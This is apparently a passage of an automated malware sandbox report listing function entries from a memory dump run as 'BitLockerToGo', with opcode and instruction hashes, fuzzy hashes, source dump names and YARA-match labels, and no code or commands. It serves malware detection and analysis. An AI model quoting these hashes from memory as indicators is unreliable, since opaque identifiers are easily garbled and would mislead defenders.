                                                                                                                                                            • Opcode ID: a5db739bc64e2c99662758e10bbfedd6052b1e031c34e72dee04f5c816a2f574
                                                                                                                                                            • Instruction ID: 941cfb58be2f6ff2e4026e36fa0dbe6ceba7a5a9dbdb20ab407d8ebbfa1c3b9a
                                                                                                                                                            • Opcode Fuzzy Hash: a5db739bc64e2c99662758e10bbfedd6052b1e031c34e72dee04f5c816a2f574
                                                                                                                                                            • Instruction Fuzzy Hash: 7682147A61C291DFD304CF28D85126AB7E2FB86716F098ABDE0C483791C339DA55CB85
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
                                                                                                                                                            • Instruction ID: fddc4bbdbfca3ff58305c710f32b9e2df51800236505f9ed759e35df3333971b
                                                                                                                                                            • Opcode Fuzzy Hash: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
                                                                                                                                                            • Instruction Fuzzy Hash: 3232EC75608602DFC704CF28D89066AB3E2FF8A304F49897DE8859B392D779EC51CB49
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: `;B
                                                                                                                                                            • API String ID: 0-334945718
                                                                                                                                                            • Opcode ID: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
                                                                                                                                                            • Instruction ID: 90752fbd8667fa49cb39373b4d57b7a022a3754a131126f3b9a8cd52922f7a36
                                                                                                                                                            • Opcode Fuzzy Hash: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
                                                                                                                                                            • Instruction Fuzzy Hash: F202CEB4A00229CBDB18CF54D8A07AFB7B1FF46314F044599E8566F395E3789D41CBA8
                                                                                                                                                            APIs
                                                                                                                                                            • CoCreateInstance.OLE32(00441538,00000000,00000001,00441528), ref: 0041C429
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 542301482-0
                                                                                                                                                            • Opcode ID: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
                                                                                                                                                            • Instruction ID: efcd27da777c76614afb9578cb524e59ae1329c01c42d79ba0897e48e3ba55ec
                                                                                                                                                            • Opcode Fuzzy Hash: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
                                                                                                                                                            • Instruction Fuzzy Hash: 0051D1B1684314ABD7209B64CCD6BB773A5EF85368F044559F985CB390F378E880C76A
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 2994545307-2766056989
                                                                                                                                                            • Opcode ID: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
                                                                                                                                                            • Instruction ID: 258c2d8b245171ec294772d4e7ba01eafee234919c336b5a4c57a840b15ac809
                                                                                                                                                            • Opcode Fuzzy Hash: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
                                                                                                                                                            • Instruction Fuzzy Hash: 2131BE715083058BC700DF18D8C066FBBF5FF89314F14992DEA8897361D339A909CB6A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 9
                                                                                                                                                            • API String ID: 0-2366072709
                                                                                                                                                            • Opcode ID: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
                                                                                                                                                            • Instruction ID: 5827e64180ae8c9ecbfa916954df96341b4aca638215bbeed84665d770a76ffe
                                                                                                                                                            • Opcode Fuzzy Hash: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
                                                                                                                                                            • Instruction Fuzzy Hash: E841007461C380AFC344CF24D49475ABBE0AB8A399F84592DE4CAA7262D374D994CB1A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
                                                                                                                                                            • Instruction ID: 92dcab289aa62de7b9c8f2860d3ca437cb8ed3b928ab2de44b4819d1736fb165
                                                                                                                                                            • Opcode Fuzzy Hash: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
                                                                                                                                                            • Instruction Fuzzy Hash: 0F529E316183118BC725DF18D48026BB3E2FFD4318F29893ED996A7386D739AC56CB46
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0e6245018b3af36d5f440a83f9b501c6fe337033f672261694fe6a957c5f91ef
                                                                                                                                                            • Instruction ID: 2a8b997cd6b374122676e3b10dc1b71284b029c115607e8b59cf8426b00fc424
                                                                                                                                                            • Opcode Fuzzy Hash: 0e6245018b3af36d5f440a83f9b501c6fe337033f672261694fe6a957c5f91ef
                                                                                                                                                            • Instruction Fuzzy Hash: BF52A1315087458FCB14CF18C0906ABBBE1FF89314F598A7EE89A67381D779A845CF89
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 01af1e3bcc74de70253ed4a434e978d21b2ce6edaadbcbc453918898fe344983
                                                                                                                                                            • Instruction ID: f1d7b7e80642e3a79158bdbd0d1fe1881403f8e5e5f554d2363d1c2836c476db
                                                                                                                                                            • Opcode Fuzzy Hash: 01af1e3bcc74de70253ed4a434e978d21b2ce6edaadbcbc453918898fe344983
                                                                                                                                                            • Instruction Fuzzy Hash: 3B320170514B118FC368CF29C69052BBBF1FF45710BA04A2ED6A7A7B90D73AB845CB18
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f0f618cf574632e83f4d3dc4512d14d9c676e5de105abb29ed967a83999bfed6
                                                                                                                                                            • Instruction ID: a7e2b0d83912b5998f30f5188c68aa7b7c4fe8239b963cf5c8fdd7a5a903873c
                                                                                                                                                            • Opcode Fuzzy Hash: f0f618cf574632e83f4d3dc4512d14d9c676e5de105abb29ed967a83999bfed6
                                                                                                                                                            • Instruction Fuzzy Hash: 6812C93564C3418FC708CF29C88176AFBE2BFC9304F18886DE48597391DA7AD806C796
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a69d8c2be54ec1e9507784927750d37b642b746aee52f5a7387f18bc8be31710
                                                                                                                                                            • Instruction ID: 119d4748fadd799b7c911a5d7bb0b86b7be7e51743f141d384cb91f08efe248f
                                                                                                                                                            • Opcode Fuzzy Hash: a69d8c2be54ec1e9507784927750d37b642b746aee52f5a7387f18bc8be31710
                                                                                                                                                            • Instruction Fuzzy Hash: 4BD1067AA1C251CFC714CF28E84052AB7E1BF8A355F0A4ABDD89597391C734ED42CB85
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f25ba54f22160b62489f088b280ed3c74614becc05bd915a8a94b8ab1d088ded
                                                                                                                                                            • Instruction ID: f08ba5470470ffa6063a8b3bc8b37c89f9044d94947f2a98b8b8c3894fdb4f30
                                                                                                                                                            • Opcode Fuzzy Hash: f25ba54f22160b62489f088b280ed3c74614becc05bd915a8a94b8ab1d088ded
                                                                                                                                                            • Instruction Fuzzy Hash: 1AF181B1919B808AC310BF74DD0631BBEF1EF9274AF49895DD4C84B242E274965C9FA3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b14d02fc5997136521a6d95f2f9aacbedaf3fba7fc823ef32d6250139b3adea6
                                                                                                                                                            • Instruction ID: 9fb43e77259d6964725a8e00412b911133945f0e3cf68f0fdd0b3c6d9e57c9ae
                                                                                                                                                            • Opcode Fuzzy Hash: b14d02fc5997136521a6d95f2f9aacbedaf3fba7fc823ef32d6250139b3adea6
                                                                                                                                                            • Instruction Fuzzy Hash: 34F16FB1919B808AC300BF74DD0631BBEF1EF5274AF49885DE4C84B242E275965C9FA3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
                                                                                                                                                            • Instruction ID: bf4e49d12bc1c1665af36ef709e149d706979a2f605b67f4024150dc15a0677b
                                                                                                                                                            • Opcode Fuzzy Hash: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
                                                                                                                                                            • Instruction Fuzzy Hash: 6FC157B150C3808BD325EF19C480B9FBBE5AF96305F04092DE5C897392E37A9995CB5B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
• Instruction ID: 024cdc7791de9666e079f96fcf25aeb5d0b7ea6c5449eb9628e7a889d73add34
• Opcode Fuzzy Hash: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
• Instruction Fuzzy Hash: A0C15BB2A487418FC360CF68CC86BABB7F1BF85318F08492DD1D9D6242E778A155CB46
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f86dc34d9228e07512daa7122b746a33267282d4b420ae713972d3ba4e0960ab
• Instruction ID: 51c07979957a548329d311152b826891065da3c05e7d59a06228ef43514d0c60
• Opcode Fuzzy Hash: f86dc34d9228e07512daa7122b746a33267282d4b420ae713972d3ba4e0960ab
• Instruction Fuzzy Hash: C7A11336E05250CFDB188F38E85079DB7B2AF4B320F6982A9E455672A2C7759D01CB54
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
• Instruction ID: 44a10b8166b9542d1297fef0e512eb72cf3d4b744219662fe86510ca9cb9bf4d
• Opcode Fuzzy Hash: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
• Instruction Fuzzy Hash: 48C16BF2819B81AAD310BB74D90630ABEF0EB6130AF058D6DD9D84B352E275855CDF63
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
• Instruction ID: ab4d46f6886bff64f1ff400ef49edc62abd5e6fecd7fd0d2724ed8df8bc51dab
• Opcode Fuzzy Hash: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
• Instruction Fuzzy Hash: 76B1D6B15187818BC304EFB4DA1621EBEA0EF52309F85892DD9C94B3C2E7B4955CC7A7
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
• Instruction ID: f79cfc653f8a236ff0e4eb88f2fa697002daeed1f849f636e8105431ebf0ed9b
• Opcode Fuzzy Hash: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
• Instruction Fuzzy Hash: 1A91CF74A083068FC714DF18D890A2BB3E1FF89754F14A92DE8958B361E734EC15CB8A
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
• Instruction ID: 74229395bd622ba83758d914417b85b284bfe95890b0f9ead982590fdd29cebe
• Opcode Fuzzy Hash: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
• Instruction Fuzzy Hash: D4B1D6B15187818BC304EFB4DA1521EBEA0EF5230AF85892DD5C94B3C2E7B8955CC7A7
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e7341bf004560a97d8c87bf88d6869f2221bb2125ae592de106e76b6c34dd79e
• Instruction ID: d4f95eff0c6f4f7f39b7b4ee0f821fb604f172ee2f3bd783a0200100271ac5b8
• Opcode Fuzzy Hash: e7341bf004560a97d8c87bf88d6869f2221bb2125ae592de106e76b6c34dd79e
• Instruction Fuzzy Hash: 1CA1E175A083118BC724CF29C89066BB3E2FFC9714F094A6EE995973A1E738DC51C786
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e36f3e65ab91e65b920d6437ce122a46afec130656b65952dc49fab11e964c3e
• Instruction ID: b2bf402c0d5208f240a3ca545f78845cbbb71db569564a351566592ac4bdeb44
• Opcode Fuzzy Hash: e36f3e65ab91e65b920d6437ce122a46afec130656b65952dc49fab11e964c3e
• Instruction Fuzzy Hash: 2A91F475A083129BC718DF19C880A2BB3A2FF89710F15993DE9855B365E739EC05CB85
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3fb4020c5521aced5b3e08e76055d1455778474d848be2944544df971b54b495
• Instruction ID: 6e09b93b6071548f7f33d6d877c88c54358bd2c0e6b28e262c8c46ed1bd6da36
• Opcode Fuzzy Hash: 3fb4020c5521aced5b3e08e76055d1455778474d848be2944544df971b54b495
• Instruction Fuzzy Hash: FEA1C17AA1C251CFC704CF28E84012AB7E2BF8A351F094ABDE99597361C735ED52CB85
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bd7e67c71fca43e499f3b871940b55849b0c8863c6c3ce28992cc683c7bab39
• Instruction ID: fc82510f52bf6087822b86615d7abc9cee42ac29b3b6934e6797e7667ee53b80
• Opcode Fuzzy Hash: 2bd7e67c71fca43e499f3b871940b55849b0c8863c6c3ce28992cc683c7bab39
• Instruction Fuzzy Hash: 48516BB15087548FE314DF29D49435BBBE1BBC8318F044A2EE4E987350E379DA088B86
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
• Instruction ID: 5b4add5e1241a50acf4a0c27d19a57122d98eb62bacac81d48fa4c35dabefd35
• Opcode Fuzzy Hash: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
• Instruction Fuzzy Hash: 1A6165B49003468FDB24CF96CA80AABBBB1FF45300F54899DD8562B7A5C334A945CF99
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
• Instruction ID: 83b00c8cc46b3c421b1fb70478cb50fa9a587cc66f5d920c7afb7ad7d0a020ab
• Opcode Fuzzy Hash: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
• Instruction Fuzzy Hash: D15187B060C3408BD314DF19C490B2BBBE1EF96798F144A1DE1D59B3A1C7389980CB9B
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed7e0901103af58e5fa071d4013c0b56a614786a0157ff7aaa1e44e9462629bb
• Instruction ID: 1009f558265df53637f6b8ac53c336df18721695cf8bd4328ce3d730200498b0
• Opcode Fuzzy Hash: ed7e0901103af58e5fa071d4013c0b56a614786a0157ff7aaa1e44e9462629bb
• Instruction Fuzzy Hash: 61410472A0C2900FD318CE7A889012ABBE2ABC5310F19C63EF4A5873D5E678D949E755
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3121f8f5a0f67be903df0b47ca02edfcf4cf31be344c8930a7dfba720e053bd9
• Instruction ID: d2635462b4ab400e84524d7dafd426a6581e2c52b87906c304c6c864b1d1cc97
• Opcode Fuzzy Hash: 3121f8f5a0f67be903df0b47ca02edfcf4cf31be344c8930a7dfba720e053bd9
• Instruction Fuzzy Hash: 6741E8B614D3C18ED310EFA9D94135ABFE1EBA1749F05882EE2D487382C279D584DB17
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 88f3362e92b9ad200e237da3fd43e9ff3808e324bec770af1178076eae2b4150
                                                                                                                                                            • Instruction ID: 242acf4b927746ba3ab6d819923eade92f6fb5dd5addcc2a0222d8c9263bfa09
                                                                                                                                                            • Opcode Fuzzy Hash: 88f3362e92b9ad200e237da3fd43e9ff3808e324bec770af1178076eae2b4150
                                                                                                                                                            • Instruction Fuzzy Hash: D741D7B514D3818ED310EFA9DA4135EBFE1EBA1B05F05882EE2D487382D279D948DB17
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 168a163eeaa70515f38e33a7f6ed36d3ff672a94032091d6b978f620f25d68b9
                                                                                                                                                            • Instruction ID: 3f8ac2c791878c3e1ec65c10d0197e32b5e094d75d118e0128de83a3324813f4
                                                                                                                                                            • Opcode Fuzzy Hash: 168a163eeaa70515f38e33a7f6ed36d3ff672a94032091d6b978f620f25d68b9
                                                                                                                                                            • Instruction Fuzzy Hash: F541C5B111E3809ED350EF65D15139EBEE0FB96709F858C1EE0C8A7282C3788985DB27
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
                                                                                                                                                            • Instruction ID: 6f21f8a450a4d2a471238150a230ac53d16a03e3977fccb7e2fd949729755662
                                                                                                                                                            • Opcode Fuzzy Hash: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
                                                                                                                                                            • Instruction Fuzzy Hash: B53197356142019BD7149E19C88092BBBE5EFC431AF148A3EE895A73C1D239ED52CB8A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0c03b2da3f499f7d776796be327bd0fee3343ff288cd46ab0a7c66bcae9d2a22
                                                                                                                                                            • Instruction ID: 5386673c98c0a2bcc4a7b51348e99bebb505b149e3ebd21c8f34e538e8e9e42b
                                                                                                                                                            • Opcode Fuzzy Hash: 0c03b2da3f499f7d776796be327bd0fee3343ff288cd46ab0a7c66bcae9d2a22
                                                                                                                                                            • Instruction Fuzzy Hash: BF11A276B296214BE758DF52D8F463A6352E7D631070B003EDF4767281CE31E811D2A4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                            • Instruction ID: c944ce86796ee1d2d956b70cdcd2fc0150e1b0d4031ee3526a5232655da8fe44
                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
